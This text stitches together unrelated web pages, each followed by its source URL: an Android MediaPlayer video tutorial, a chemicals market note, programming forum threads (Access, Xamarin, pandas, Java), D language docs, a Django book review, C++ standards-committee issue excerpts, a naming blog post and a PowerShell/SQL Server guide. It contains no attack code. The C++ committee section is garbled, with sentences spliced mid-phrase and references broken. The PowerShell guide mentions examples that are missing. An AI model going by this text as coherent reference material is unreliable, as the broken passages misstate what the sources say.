    play_button.setImageResource(android.R.drawable.ic_media_pause)
  }
}

Here you:

- Check if MediaPlayer is playing any video.
- If it is, you pause the video and change the button icon to play.
- If not, you play the video and change the button icon to pause.

Next, replace all the code added to onPrepared()'s body with calls to initializeSeekBar() and updateSeekBar(), which you created earlier:

initializeSeekBar()
updateSeekBar()

Now your app is more intuitive. Build and Run. You can play or pause the video and see the progress on the seekBar and TextView.

Interacting with the SeekBar

Now the app is more intuitive for the user, except for the SeekBar. Even though the SeekBar updates with time, you can't fast-forward or rewind the video by tapping or dragging it. For that, you'll use the onProgressChanged() method of SeekBar. Whenever there's a change in the SeekBar's progress, it will invoke this function.

The SeekBar change listener is already in the code, so navigate to onProgressChanged() and replace // TODO (8) with:

if (fromUser) {
  mediaPlayer.seekTo(progress * SECOND)
}

The function onProgressChanged() has three parameters:

- seekBar: Instance of the SeekBar.
- progress: Progress of the SeekBar in seconds.
- fromUser: Boolean which tells you if the change is because of user interaction. If the change in progress is due to user interaction, it'll be true. If not, it'll be false.
You use this parameter to update MediaPlayer's progress only when the seekBar's progress level is changed manually. Now your user can fast-forward or rewind the video using the seekBar. Build and run to give it a try. :]

Playing Video from the Gallery

The app works great now, but it would be better if users could select a video from their gallery and play it. You'll implement that next. The options button in the toolbar and its functionality are already in the starter project. Before you add new code, you need to understand what's happening in the existing code. When the user selects an option, the app invokes onOptionsItemSelected() with the menuItem as a parameter.

Now, inside the when statement replace // TODO (9) with:

// 1
val intent = Intent()
// 2
intent.type = "video/*"
// 3
intent.action = Intent.ACTION_GET_CONTENT
// 4
startActivityForResult(Intent.createChooser(intent, getString(R.string.select_file)), GET_VIDEO)

Here you use an intent to get the URI for the file the user selected from the gallery. In the code:

- You create an Intent, which is a messaging object in Android used to request different action types.
- You ensure that the intent type is a video format.
- Then you specify that this is an intent with a get-content action.
- Finally, you trigger the intent and wait for a result.

Playing the video after it has been selected

Once the activity returns a result from the intent, onActivityResult() is invoked with GET_VIDEO as its requestCode. Inside the onActivityResult() function replace // TODO (10) with:

// 1
if (resultCode == Activity.RESULT_OK) {
  // 2
  if (requestCode == GET_VIDEO) {
    // 3
    selectedVideoUri = data?.data!!
    // 4
    video_view.holder.addCallback(this)
  }
}

Here you:

- Check the resultCode. If the operation executed successfully, it returns Activity.RESULT_OK.
- Check the requestCode to identify the caller and confirm the request was actually for a video.
- Assign the URI to the selectedVideoUri variable you declared earlier.
- Invoke surfaceCreated() by calling video_view.holder.addCallback(this).

It will probably ask you to import Activity, so add it at the top of the file with your other imports:

import android.app.Activity

Next, update setDataSource() so you pass the correct URI as the parameter. Navigate to surfaceCreated() and replace the function body with:

mediaPlayer.apply {
    setDataSource(applicationContext, selectedVideoUri)
    setDisplay(surfaceHolder)
    prepareAsync()
}

Voila! Now your user can open the gallery, select a video and play it in your app. Build and run to see how it works now.

Releasing the Resources

The MediaPlayer API consumes a lot of resources, so you should always release them by calling release(). As per the official Android documentation, you should release the resources whenever your app is in the background or stopped state. Failing to do so could lead to continuous battery consumption for the device, and to playback failure for other apps if multiple instances of the same codec aren't supported. It could also degrade the device's performance in general.

In onDestroy(), replace // TODO (11) with:

handler.removeCallbacks(runnable)
mediaPlayer.release()

Here you remove the runnable from the message queue by calling removeCallbacks(). If you didn't, your runnable would keep executing in the background.

Build and run. It looks like nothing changed, but you've ensured the resources are released when the user kills the app.

Executing Asynchronously

Asynchronous code is very important for Android apps. You may not have noticed, but you are already loading the video asynchronously. In most cases, videos are heavy and take time to load, so you need to make the code asynchronous. If you load a heavy video synchronously on the main thread instead, MediaPlayer will lead the app to an ANR, or Application Not Responding, state. In short, your app will become non-responsive and crash.
To load the media file asynchronously, all you did was call prepareAsync() instead of prepare() inside the surfaceCreated() function. In other words, if you swapped in prepare() on that line and ran the app, the UI would freeze while the video loads. Seriously, that's it! That's all you had to do.

Next, you'll implement asynchronously streaming a video from a URL.

Streaming a Video From a URL

Fortunately, you don't have to make many changes to prepare MediaPlayer asynchronously and stream a video from a URL. In surfaceCreated(), replace the setDataSource() call with:

setDataSource(URL)

and make sure the block still calls prepareAsync() rather than prepare(). After you make those changes, surfaceCreated() will look like this:

override fun surfaceCreated(surfaceHolder: SurfaceHolder) {
    mediaPlayer.apply {
        setDataSource(URL)
        setDisplay(surfaceHolder)
        prepareAsync()
    }
}

Nice! Now your MyTube app can play videos from the res directory and the gallery, and even stream a video from a URL. Before you finish, there's one more topic you need to explore: DRM, or Digital Rights Management.

Digital Rights Management

DRM, or Digital Rights Management, technologies are a set of tools that protect or encrypt video and audio files. There are many technologies that help with that, such as Microsoft's PlayReady and Google's Widevine. Working with DRM-protected files is a topic worthy of its own tutorial.

MediaPlayer added support for playing DRM-protected videos in Android 8, API level 26. If you want to play a DRM-protected video, you either have to set your app's minSdkVersion to 26, or annotate your class with @RequiresApi(Build.VERSION_CODES.O).

DRM MediaPlayer

Because DRM mostly relies on the security-by-obscurity principle, it's hard to get your hands on any DRM-protected media files. You won't play a DRM-protected file here, as it's too complicated for this tutorial. Instead, you'll see an overview of the changes you have to make to play one. Take a look at onCreate() again.
You'll see this:

mediaPlayer.setOnDrmInfoListener(this)

This line of code tells MediaPlayer that it could be accessing a DRM-protected file. You don't have to worry about the app crashing if the media file is not DRM protected: It takes care of that itself. If the media file is DRM protected, the app invokes onDrmInfo().

After that, inside onDrmInfo(), replace // TODO (12) with:

mediaPlayer?.apply {
    // 1
    val key = drmInfo?.supportedSchemes?.get(0)
    key?.let {
        // 2
        prepareDrm(key)
        // 3
        val keyRequest = getKeyRequest(
            null, null, null,
            MediaDrm.KEY_TYPE_STREAMING,
            null
        )
        // 4
        provideKeyResponse(null, keyRequest.data)
    }
}

Here you:
- Fetch the UUID, or key, of the DRM scheme in use. There are several types of DRM protection schemes. Examine the map of UUIDs in drmInfo?.supportedSchemes?.get(0) to retrieve the supported schemes. Which schemes are supported depends mainly on the device and OEM; if you ever work with DRM, you'll need to dive deeper into this topic.
- Pass the retrieved key to prepareDrm() to prepare the DRM.
- Get the decryption key from the license server using getKeyRequest().
- Then provide the key response from the license server to the DRM engine plugin using provideKeyResponse().

Android Studio will most likely ask you to import the DRM library, so add the following line at the top of your file with your other imports:

import android.media.MediaDrm

This code is only for demonstration purposes. It won't affect the app, since you don't have access to any DRM-protected files. If you ever have to work with a DRM-protected media file, a better alternative is ExoPlayer, because it provides more functionality.

Where To Go From Here?

Congratulations on your first MediaPlayer app! You can download the final project using the Download Materials button at the top or bottom of this tutorial.

In this tutorial, you covered some basics of MediaPlayer, like:
- Understanding MediaPlayer and its states.
- Playing video from the res/raw folder.
- Playing video from a URL.
- Async programming.
- Best practices for MediaPlayer.
- Digital Rights Management.

While you covered a lot in this tutorial, there's still more to learn. For a next step, explore ExoPlayer. Google created ExoPlayer, a library that lets you take advantage of features not yet supported by the MediaPlayer API, such as DASH and SmoothStreaming. To learn more about ExoPlayer, check out our ExoPlayer tutorial.

I hope you enjoyed this tutorial. If you have any questions or comments, please join the discussion below. :]
https://www.raywenderlich.com/14273655-mediaplayer-simplified-video-playback-on-android
10 September 2009 12:05 [Source: ICIS news]

November PVC and LLDPE contracts fell by 0.57% to yuan (CNY) 6,930/tonne ($1,015/tonne) and 0.09% to CNY10,455/tonne respectively, according to data from the Dalian Commodity Exchange (DCE), as trading sentiment was dampened slightly by a decline in the Chinese stock exchanges, a local PVC producer said.

Trading volume for November PVC futures fell to 81,348, a 38% decline from Wednesday and the lowest since late July, as market players preferred to stay on the sidelines in the absence of new market developments, the producer added.

($1 = CNY6.83)

With additional reporting by Chow Bee Lin
http://www.icis.com/Articles/2009/09/10/9246431/china+polymers+futures+edge+down+on+subdued+sentiment.html
Anything you don't understand, just ask.

Add a Smart Tag to a Control on a Form, Report, or Data Access Page
--------------------------
1. Open the form, report, or data access page in Design View.
2. Select a control and then click Properties on the toolbar to open the control's property sheet.
3. Click on the Data tab.
4. In the SmartTags property box, do one of the following: Click the Build button in the SmartTags property box to open the Smart Tags dialog box, click the smart tag that you want to add to the control, and then click OK. Or type the namespace Uniform Resource Identifier (URI) for the smart tag in the SmartTags property field. (Select PersonName)

Any update on your issue?

I have been struggling with this on and off for years - I wrote a database for the sailing club 10 years ago and they keep pestering me to do this update and I have been unable to get it to work - so thanks. Sorry for the late reply - I have a day job and I am doing this update to the database for free!
https://www.experts-exchange.com/questions/27634395/Email-from-access-2003.html
Module std.checkedint

This module defines facilities for efficient checking of integral operations against overflow, casting with loss of precision, unexpected change of sign, etc. The checking (and possibly correction) can be done at operation level, for example opChecked!"+"(x, y, overflow) adds two integrals x and y and sets overflow to true if an overflow occurred. The flag overflow (a bool passed by reference) is not touched if the operation succeeded, so the same flag can be reused for a sequence of operations and tested at the end.

Issuing individual checked operations is flexible and efficient but often tedious. The Checked facility offers encapsulated integral wrappers that do all checking internally and have configurable behavior upon erroneous results. For example, Checked!int is a type that behaves like int but aborts execution immediately whenever involved in an operation that produces the arithmetically wrong result. The accompanying convenience function checked uses type deduction to convert a value x of integral type T to Checked!T by means of checked(x). For example:

void main()
{
    import std.checkedint, std.stdio;
    writeln((checked(5) + 7).get); // 12
    writeln((checked(10) * 1000 * 1000 * 1000).get); // Overflow
}

Similarly, checked(-1) > uint(0) aborts execution (even though the built-in comparison int(-1) > uint(0) is surprisingly true due to the language's conversion rules modeled after C). Thus, Checked!int is a virtually drop-in replacement for int usable in debug builds, to be replaced by int in release mode if efficiency demands it.

Checked has customizable behavior with the help of a second type parameter, Hook. Depending on what methods Hook defines, core operations on the underlying integral may be verified for overflow or completely redefined.
If Hook defines no method at all and carries no state, there is no change in behavior, i.e. Checked!(int, void) is a wrapper around int that adds no customization at all.

This module provides a few predefined hooks (below) that add useful behavior to Checked:

These policies may be used alone, e.g. Checked!(uint, WithNaN) defines a uint-like type that reaches a stable NaN state for all erroneous operations. They may also be "stacked" on top of each other, owing to the property that a checked integral emulates an actual integral, which means another checked integral can be built on top of it. Some combinations of interest include:

The hook's members are looked up statically in a Design by Introspection manner and are all optional. The table below illustrates the members that a hook type may define and their influence over the behavior of the Checked type using it. In the table, hook is an alias for Hook if the type Hook does not introduce any state, or an object of type Hook otherwise.

Example

int[] concatAndAdd(int[] a, int[] b, int offset)
{
    // Aborts on overflow on size computation
    auto r = new int[(checked(a.length) + b.length).get];
    // Aborts on overflow on element computation
    foreach (i; 0 .. a.length)
        r[i] = (a[i] + checked(offset)).get;
    foreach (i; 0 .. b.length)
        r[i + a.length] = (b[i] + checked(offset)).get;
    return r;
}
writeln(concatAndAdd([1, 2, 3], [4, 5], -1)); // [0, 1, 2, 3, 4]

Example

Saturate stops at an overflow:

auto x = (cast(byte) 127).checked!Saturate;
writeln(x); // 127
x++;
writeln(x); // 127

Example

WithNaN has a special "Not a Number" (NaN) value akin to the homonym value reserved for floating-point values:

auto x = 100.checked!WithNaN;
writeln(x); // 100
x /= 0;
assert(x.isNaN);

Example

ProperCompare fixes the comparison operators ==, !=, <, <=, >, and >= to return correct results:

uint x = 1;
auto y = x.checked!ProperCompare;
assert(x < -1); // built-in comparison
assert(y > -1); // ProperCompare

Example

Throw fails every incorrect operation by throwing an exception:

import std.exception : assertThrown;
auto x = -1.checked!Throw;
assertThrown(x / 0);
assertThrown(x + int.min);
assertThrown(x == uint.max);
https://dlang.org/library/std/checkedint.html
Hi, I need to set the ListView caching to recycle, and it works. The problem is that when I filter the results, the objects inside go blank. To filter I use:

txtPesquisa.TextChanged += (sender, e) =>
{
    lista.BeginRefresh();
    lista.ItemsSource = ClientesBD.GetClientes(txtPesquisa.Text);
    lista.EndRefresh();
};

Answers

My ListView:

lista = new MyListView(ListViewCachingStrategy.RecycleElement)
{
    Margin = new Thickness(10),
    RowHeight = 60,
    ItemTemplate = new DataTemplate(typeof(ClienteCell))
};

My template:

[Foundation.Preserve(AllMembers = true)]
public class ClienteCell : ViewCell
{
    protected override void OnBindingContextChanged()
    {
        base.OnBindingContextChanged();
    }
}

Have you tried filtering with System.Linq instead?

lista.ItemsSource = ClientesBD.GetClientes().Where(w => w.nome.ToLower().Contains(txtPesquisa.Text.ToLower())).ToList();

You would need the GetClientes() method to return all results if the filter is null. Code isn't tested but should work.

@seanyda Thanks for your answer. It doesn't work anyway. Inside the method I am using Linq to filter the results. It filters, but the list view turns into blank lines.

I use System.Linq to do all my filtering from a list; it's always worked perfectly. If you can show me all your code I might be able to fix it for you.

@seanyda Did you set the caching strategy to recycle? Here you go:

@seanyda Did you manage to solve it?
https://forums.xamarin.com/discussion/105726/listview-listviewcachingstrategy-recycleelement
I want to filter down a dataframe. Trying to use the standard boolean (multiple) expressions, but it doesn't work. My code is:

import pandas as pd
import numpy as np

# Setting a dataframe
dates = pd.date_range('1/1/2000', periods=10)
df1 = pd.DataFrame(np.random.randn(10, 4), index=dates, columns=['A', 'B', 'C', 'D'])

# Filtering
df1 = df1.loc[lambda df: -0.5 < df1.A < 0 and 0 <= df1.B <= 1, :]

No need for the anonymous lambda function; note also that chained comparisons such as -0.5 < df1.A < 0 implicitly call bool() on a Series, which raises a ValueError ("The truth value of a Series is ambiguous"). Simply filter with a boolean statement. Also, notice the use of the bitwise operator, &, not the boolean operator, and. Below are equivalent variants of the filter:

df1 = df1.query('(A > -0.5) & (A < 0) & (B >= 0) & (B <= 1)', engine='python')
df1 = df1.loc[(df1.A > -0.5) & (df1.A < 0) & (df1.B >= 0) & (df1.B <= 1)]
df1 = df1[(df1.A > -0.5) & (df1.A < 0) & (df1.B >= 0) & (df1.B <= 1)]

Consider even using pandas.Series.between:

df1 = df1.loc[df1.A.between(-0.5, 0, inclusive=False) & df1.B.between(0, 1)]
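As a quick sanity check that the mask form and the query() form select the same rows, here is a self-contained run with fixed values in place of the random data (the column values below are illustrative, not from the question):

```python
import pandas as pd

# Fixed values so the result is deterministic
df = pd.DataFrame({
    "A": [-0.7, -0.3, -0.1, 0.2],
    "B": [ 0.5,  1.5,  0.9, 0.3],
})

# Boolean-mask form: & is element-wise, so each comparison needs its own parentheses
out_mask = df[(df.A > -0.5) & (df.A < 0) & (df.B >= 0) & (df.B <= 1)]

# query() form of the same condition
out_query = df.query("(A > -0.5) & (A < 0) & (B >= 0) & (B <= 1)")

print(out_mask.index.tolist())  # [2] -- only row 2 has A in (-0.5, 0) and B in [0, 1]
```

Both variants return the identical single-row frame, which is easy to confirm with out_mask.equals(out_query).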
https://codedump.io/share/7GQdFgBjjqUQ/1/filter-down-dataframe
I just finished reading the copy of Django 1.1 Testing and Debugging by Karen M. Tracey provided to us for review by Packt Publishing. For those of you who don't know, Karen is a core developer of Django, and her knowledge and experience in the framework shine through in this book. This is a great book for people who want to transition from being a hobbyist tinkering on Django sites to being a professional developer. It will be a lot to digest for a newcomer to Django and might not contain much new information if you've been working with Django for a while (and writing tests for your code). The book covers:

- doctests vs. unit tests
- integrating external tools like Nose, Coverage, and Twill
- debugging with logging, Django Debug Toolbar, and pdb
- how to get help from the Django community and file bugs
- troubleshooting Apache/mod_wsgi deployments

Even though I've been working with Django for a few years now, I still picked up some great tips and got a few nice refreshers after reading the book. In Chapter 5, Karen describes how to use Twill instead of the built-in test client. As somebody who has written tests for multi-page form wizards with an automatically generated hash, I wish I had thought of this technique at the time. By using Twill, you can ignore auto-filled form fields and just test the functionality you care about.

Another great thing about this book is the non-trivial code samples included. I love reading other people's code. You can learn a lot by seeing how other people solve problems and their general coding style. One item that struck me was the use of reverse(admin:[url_name]) in some of the examples. I had missed the addition of URL namespaces in Django 1.1 and will definitely be integrating them into my code in the future.

If you don't have much experience with testing or real debugging (not sprinkling print statements everywhere), this book is for you.
http://lincolnloop.com/blog/2010/jun/16/django-11-testing-and-debugging-book-review/
PL22.16/09-0104 = WG21 N29. 2.local])) shall not be used to declare an entity with linkage.to: A name with no linkage (notably, the name of a class or enumeration declared in a local scope (3.3.3 .8. 5.1.2 [expr.prim.lambda] paragraph 2 says, A closure object behaves as a function object (20.7 [function.objects])... This linkage to <functional> increases the dependency of the language upon the library and is inconsistent with the definition of “freestanding” in 17.6.1.3 [compliance]. Rationale (July, 2009): The reference to 20.7 [function.objects] appears in a note, not in normative text, and is intended only to clarify the meaning of the term “function object.” The CWG does not believe that this reference creates any dependency on any library facility. .14.2 [lex.icon] : No mention of true or false as an integer literal. From 2.14.7.4.1 [temp.point] paragraph 1 the indicated words: Otherwise, the point of instantiation for such a specialization immediately follows the namespace scope declaration or definition that refers to the specialization. Remove in 14.7.4.1 [temp.point] paragraph 3 the indicated words: Otherwise, the point of instantiation for such a specialization immediately precedes the namespace scope declaration or definition that refers to the specialization. Remove in 14.8 X<T>;.3 .7 [temp.res]. An example would also be helpful. Rationale (April, 2006): The CWG felt that the wording was already clear enough. According to 14.8.8.8.8 . The Standard currently specifies (7.1.3 [dcl.typedef] paragraph 9, 14. Consider: template <class T> void f(T&); template <class T> void f(const T&); void m() { const int p = 0; f(p); }Some compilers treat this as ambiguous; others prefer f(const T&). The question turns out to revolve around whether 14. In language imported directly from the C Standard, 16.2 [cpp.include] paragraph 5 says, The implementation provides unique mappings for sequences consisting of one or more nondigits (2.11 .11 .8. 
According to 3.3.9 [basic.scope.req] paragraph 2, In a constrained context .) According to 3.4.3 [basic.lookup.qual] paragraph 7, In a constrained context (14.11 [temp.constrained]), the identifier of an unqualified-id prefixed by a nested-name-specifier that nominates a dependent type T is looked up as follows: for each template requirement C<args> such that either T or an equivalent type (14.11.1 [temp.req]) is a template argument to C, the identifier of the unqualified-id is looked up as if the nested-name-specifier nominated C<args> instead of T (3.4.3.3 [concept.qual]), except that only the names of associated types and class templates (14.11.1 [temp.req]) is a constrained member and shall occur only in a class template (14.6.1 [temp.class]) or nested class thereof. The member-declaration for a constrained member shall declare a member function. A constrained member is treated as a constrained template (14.11 [temp.constrained]) whose template requirements include the requirements specified in its member-requirement clause and the requirements of each enclosing constrained template. Furthermore, 14.6.2 [temp.mem] paragraph 9 says, A member template of a constrained class template is itself a constrained template ? The grammar for constrained-template-parameter given in 14.6.1 [temp.class] paragraph 5, which currently reads, A constrained member (9.2 [class.mem]) in a class template is declared only in class template specializations in which its template requirements (14.11.1 [temp.req]) are satisfied .6.7 [temp.alias] but, unless a good use case is presented, should probably be prohibited. On the other hand,.) In the example in. 14.10.2.1 [concept.map.fct] paragraph 5 says, Each satisfied associated function (or function template) requirement has a corresponding associated function candidate set. 
An associated function candidate set is a candidate set ); } 14.10.2.2 [concept.map.assoc] paragraph 5 says, If an associated type or class template 14.10.2.1 [concept.map.fct]. Deduction of the associated type (in 20.2.9 [concept.copymove], similar to TriviallyCopyConstructible and TriviallyCopyAssignable. (14.11 [temp.constrained]) whose template requirements include the requirements specified in its member-requirement clause and the requirements of each enclosing constrained template. See also 14.10.1.1 [concept.fct] paragraph 10 for a similar rule for default implementations. A more general version of this merging of requirements is needed, but it does not appear to exist. 14.11.1.2 [temp.req.impl] would seem to be the logical place for such a rule. The example at the end of (14.11.2.1 [temp.archetype.assemble] paragraph 1) and 14.8 14.11.2.1 [temp.archetype.assemble] paragraph 5 its archetype will have a deleted destructor. As a result, several examples in the current wording are ill-formed: 14.10.2 [concept.map] paragraph 11: the add function. 14.10.3.1 [concept.member.lookup] paragraph 3: the f function. (Also missing the copy constructor requirement.) 14.10.3.1 [concept.member.lookup] paragraph 5: the h function. (Also missing the copy constructor requirement.) 14.11.1 [temp.req] paragraph 3: the f function. 14.11.1.1 [temp.req.sat] paragraph 6: the g function. (Also missing the copy constructor requirement.) 14.11.2 [temp.archetype] paragraph 15: the distance function. 14.11.2.1 [temp.archetype.assemble] paragraph 2: the foo function. 14.11.2.1 [temp.archetype.assemble] paragraph 3: the f function. 14.11.4 [temp.constrained.inst] paragraph 4 is ill-formed. The call to advance(i, 1) in f attempts to pass 1 to a parameter declared as Iter::difference_type, but there is nothing that says that int is compatible with Iter::difference_type. 
Any use of a pointer to deleted storage, even if the pointer is not dereferenced, produces undefined behavior (3.7.4.2 [basic.stc.dynamic.deallocation] paragraph 4). The reason for this restriction is that, on some historical architectures, deallocating an object might free a memory segment, resulting in a hardware exception if a pointer referring to that segment were loaded into a pointer register, and on those architectures use of a pointer register for moving and comparing pointers was the most efficient mechanism for these operations. It is not clear whether current or foreseeable architectures still require such a draconian restriction or whether it is feasible to relax it only to forbid a smaller range of operations. Of particular concern is the use of atomic pointers, which might be used in race conditions involving deallocation, where the loser of the race might encounter this undefined behavior. (See also issue 312.) Rationale (April, 2007): The current specification is clear and was well-motivated. Analysis of whether this restriction is still needed should be done via a paper and discussed in the Evolution Working Group rather than being handled by CWG as an issue/defect... According to 7.1.5 [dcl.constexpr] paragraph 3, no declarations are permitted in the body of a constexpr function. This seems overly restrictive. At least three kinds of declarations would seem to be helpful in writing such functions: static_assert, typedef and alias declarations, and local automatic variables initialized with constant expressions. (Similar considerations apply to lambdas in which the lambda-return-type-clause is omitted.) Rationale (July, 2009): This suggestion needs a proposal and analysis by EWG before it can be considered by CWG. . 14.8.
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2938.html
System.arraycopy(java.lang.Object, int, java.lang.Object, int, int)

It is not classwork but a skill-evaluation question, which I did not do very well on. So I would like to see different solutions. But thanks for your direction. RD

A linked list is a data structure in which a series of node objects (each with a Node nextNode field) point to the next node in the list. Check that out for some decent info.

--------------------------

public class MyArray {
    private int max = 10;
    private Object[] objs = new Object[max];
    private int increment = 10;
    private int size = 0;

    public void add(Object o) {
        if (size == max) {
            max = max + increment;
            Object[] temp = new Object[max];
            System.arraycopy(objs, 0, temp, 0, size);
            objs = temp;
        }
        objs[size++] = o;
    }

    public int size() {
        return size;
    }

    public void remove(int index) {
        // shift the tail left by one; size - index - 1 elements follow position index
        System.arraycopy(objs, index + 1, objs, index, size - index - 1);
        objs[--size] = null;
    }

    public Object get(int index) {
        if (index >= size || index < 0)
            throw new ArrayIndexOutOfBoundsException();
        return objs[index];
    }
}

--------------------------
kimboon

If you HAVE to create your own, the one above looks about right EXCEPT the size you should return is the number of items that have been added, not the physical size of the array, as if you try to return an uninitialised cell you'll get an unwanted Exception (i.e. java.util.Vector returns the number of items added, not the physical size of the internal storage array).

Also, wherever possible, you should try to implement applicable interfaces. In this case, implementing the Collection interface would make the class very useful (and powerful).
I agree with you that we should always consider the use of existing APIs. I'm sure rdong is aware of the Vector class (since he mentioned it himself), but I believe his purpose is to understand how we can implement a Vector class using a basic array... or maybe it's just to know how a Java array can be made "expandable"? I don't know; I'll leave it to rdong to answer :)

BTW, to make my code posted above complete, I forgot to include the checking of the index in the remove() method. Thanks.
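To see the grow-and-remove behavior in action, here is a small self-contained driver in the spirit of the thread (the class is re-declared as a nested type purely so the snippet compiles on its own; the growth increment and test values are illustrative):

```java
// Minimal growable array along the lines of the thread's MyArray.
public class MyArrayDemo {
    static class MyArray {
        private Object[] objs = new Object[10];
        private int size = 0;

        void add(Object o) {
            if (size == objs.length) {
                // grow the backing array by a fixed increment
                Object[] temp = new Object[objs.length + 10];
                System.arraycopy(objs, 0, temp, 0, size);
                objs = temp;
            }
            objs[size++] = o;
        }

        void remove(int index) {
            if (index >= size || index < 0)
                throw new ArrayIndexOutOfBoundsException();
            // shift the tail left; size - index - 1 elements follow position index
            System.arraycopy(objs, index + 1, objs, index, size - index - 1);
            objs[--size] = null; // clear the stale slot
        }

        Object get(int index) {
            if (index >= size || index < 0)
                throw new ArrayIndexOutOfBoundsException();
            return objs[index];
        }

        int size() { return size; }
    }

    public static void main(String[] args) {
        MyArray a = new MyArray();
        for (int i = 0; i < 25; i++) a.add(i); // forces two grow steps (10 -> 20 -> 30)
        a.remove(0);
        System.out.println(a.size()); // 24
        System.out.println(a.get(0)); // 1
    }
}
```

Note that size() reports the logical element count (24 here), not the physical capacity of the backing array (30), matching the java.util.Vector convention mentioned above.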
https://www.experts-exchange.com/questions/20949711/how-to-implement-an-expandable-array.html
Naming the Patron Object— Rovani in C♯

There are only two hard things in Computer Science: cache invalidation and naming things. - Phil Karlton

To any seasoned developer, this is entirely too true, and many people have written extensively on why this is so hard. For this particular exercise, I have to decide what to call the core object that represents a (potentially) giving unit in Vigil. Trolling through existing applications, here are some options I have come across, and why I rejected them:

- Client - feels too impersonal for a DRM, though I know there are non-profits that use this as their preferred term.
- Constituent - the term is mostly used with voting systems. Also, I am really loath to type out "Constituent" thousands of times.
- Customer - this term is associated more with a point-of-sale system than a donation tracking system.
- Donor - not all names in the database are going to be actual donors. Some will just be people that purchased something, and many will not even have given (in a system I recently worked on, around 55% of the names were non-donors).
- Entity - this conflicts heavily with Entity Framework, where the Entity object is used everywhere.
- Patron - this is a compelling term, since it has the dual definition of being both a person who gives financially and a customer of a store.

The other part of the name is that it needs to pair with all of the auxiliary tables that will be prefixed with:

- ____Address
- ____Attachment
- ____BankAccount
- ____Code
- ____ContactBase
- ____CreditCard
- ____Date
- ____Identifier
- ____Note
- ____Number
- ____Payment
- ____Person
- ____Phone
- ____Relationship

And that's just the preliminary list! I had initially gone with Entity, since that is what our current system uses. However, I quickly tired of running into the namespace conflicts with EF, and thus went searching for alternatives.
I had almost settled on Constituent, until I went to start the re-factoring; after the twelfth time typing it, I realized it was going to cause CTS. Patron was a late find that I stumbled upon. Thesauruses are my friends. So far, I am really digging it. I figure I get one re-factoring before I hit the point of no return. I am hoping this is the right one.
https://rovani.net/Naming-The-Patron-Object/
What extra do I need to access SQL Server from PowerShell?

You don't need anything additional in the way of .NET libraries or PowerShell modules to work with SQL Server, but for many scripting tasks you can get a lot of extra value from using them. The approach that you choose for accessing SQL Server depends on the sort of task you need to script.

- If you just need to run queries against SQL Server databases and save the results to a file, then you can simply run SQLCMD or BCP from PowerShell.
- You can choose to load the .NET data provider. This gives you a lot more versatility, but you are working at a lower level, having to create in code what is already built into SQLCMD.
- You can load SMO, or even SQLPS, the SQL Server provider that uses SMO behind the scenes. SMO is used primarily to provide all the functionality for SQL Server Management Studio. Anything you can do in SSMS you can also automate with SMO.
- With SQLPS, you can read the output from the Invoke-Sqlcmd cmdlet into PowerShell's native data objects, and you can process the results and save the data to file in a number of formats, such as XML.

The same is true of outputting data from PowerShell. The built-in features of PowerShell are enough to get you a long way, but what you use depends on your task. If you need more:

- A lot can be done with command-line tools such as BCP.
- You can use modules or functions to provide extras, such as writing output in Excel spreadsheet format.

This article is all about how you get started with all these approaches, and about how you can load and use the modules and assemblies to do this safely and effectively.

The Various methods of working with SQL Server

Running an External command-line Program

You can run external command-line programs such as OSQL, BCP or SQLCMD.
You can call those external programs inside PowerShell and then use them to query the SQL Server instance. This example will query the test table and redirect the output to a txt file.

Another approach is to use the BCP utility, which allows us very fast import or export of a table, view or query. In the following example we are exporting the product table from AdventureWorks2014.

Something to be aware of is that, if we get an error using this coding style, it will not be visible. The output will be the same; the difference will be that BCPError.txt will contain the error. Let's export a table that does not exist, called IdontExist, so as to deliberately cause an error.

'So Laerte, how can I test in my code if it was successful or not?' One approach is to use a property returned by Start-Process called ExitCode. If it is 0, the command ran with no errors; if it is 1, of course, an error occurred.

Saving the output in a variable:

Saving only the ExitCode property:

Or even, testing the property directly:

You can read more about BCP here: Working with the bcp Command-line Utility

Querying SQL Server via the .NET data provider

If you don't need SMO for any other reason, you can query SQL metadata or data, or work with any kind of SQL Server object, by using the System.Data.SqlClient namespace – the .NET Framework Data Provider for SQL Server. It will allow you to use T-SQL commands and then manage what you need in much the same way as you would with the SMO database connection methods. It does not require you to load anything extra, because the namespace is already loaded by PowerShell.
In your test database, execute this… And then, in PowerShell, amend the server instance name and database, and run the script.

If your result set returns more than one table, you can use the DataAdapter and DataSet classes:

In addition, you may want to execute a stored procedure:

Using SMO

SMO is a .NET library that enables you to work with SQL Server as objects, classes, methods and so on. When you access a database on a server, the database object provides an open System.Data.SqlClient connection that is exposed by the Database.ExecuteNonQuery and Database.ExecuteWithResults methods, which you can use for querying either the server or a database. You can use it in the same way that you use any other SqlClient connection. Check out my Stairway to Server Management Objects (SMO) Level 1: Concepts and Basics on SQLServerCentral.com.

Unlike the previous method, you need to load the SMO assembly before you can use SMO. The traditional way of doing this is to use the .NET method LoadWithPartialName. This isn't ideal, and we'll be discussing refinements to this method later on in the article.

Using SQLPS

If you use SQLPS, you will not only be able to use SMO's own .NET connection for querying databases, but you will also have the SQL cmdlets. Everything you need is loaded for you under the covers. The cmdlet to use for executing SQL is Invoke-SQLCMD, but you can get a complete list of cmdlets that are available for use once you have loaded SQLPS by using the PowerShell command …

Invoke-SQLCMD

Invoke-SQLCMD is a compiled cmdlet from SQLPS. You can also run several .SQL files. For that, let's use the amazing SQL Server Diagnostic Information Queries for September 2014 from Glenn Berry: copy some SQL from there and split it into .sql files. I've created three .sql files: FileNamesPaths.SQL, ServerProperties.SQL and SQLServerAgentjobsCategory.SQL.

One approach is using the :r parameter inside a .sql file.
First create a .sql file listing the .SQL files to run; let's call this file SQLFiles.SQL. Then just run that .sql file, and it will run all the .SQL files you have specified in SQLFiles.SQL. You may want to export the output of all the files run to a txt file.

This approach can be very useful if you just need to check the output, rather than generate reports, or even to create objects in SQL Server – a full environment, for instance.

Another approach is to call Invoke-SQLCMD for each file. For that we don't need the SQLFiles.SQL. You can, of course, export the results to CSV files. Even better, you can write an XLSX file from one or more CSV files, with each CSV file turned into a worksheet. For that, we can use the function of my fellow PowerShell MVP Boe Prox called Convert-CSVToExcel (you can download the source from the top of this article).

You can also run community functions such as Invoke-SQLCMD2, a System.Data.SqlClient-based function written by Chad Miller that extends the functionality of Invoke-SQLCMD. You just need to download it and run it inside your script, save it into a .ps1 file and call the function as a .ps1 script, load it in your profile, or even save the code in a .psm1 file (script module file) in any path shown by $env:PSModulePath, so that it loads directly when you call it (PowerShell 3.0 and higher).

Installing Modules

